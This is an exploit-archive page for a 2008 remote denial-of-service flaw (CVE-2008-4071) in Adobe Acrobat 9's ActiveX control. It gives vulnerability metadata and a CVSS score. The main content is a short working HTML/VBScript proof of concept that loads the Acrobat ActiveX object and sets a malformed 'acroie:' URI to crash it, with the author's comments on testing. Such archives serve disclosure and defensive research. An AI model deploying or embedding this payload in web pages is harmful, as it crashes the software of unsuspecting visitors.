Bug: Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit ( Ascii Version )

Search:
WLB2

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Published
Credit
Risk
2008.09.17
Jeremy Brown
Medium
CWE
CVE
Local
Remote
CWE-20
CWE-noinfo
CVE-2008-4071
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

References:

http://www.milw0rm.com/exploits/6424

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version